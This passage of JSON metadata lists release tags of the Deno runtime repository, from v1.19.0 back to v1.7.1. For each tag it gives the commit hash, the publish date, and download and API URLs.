repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"com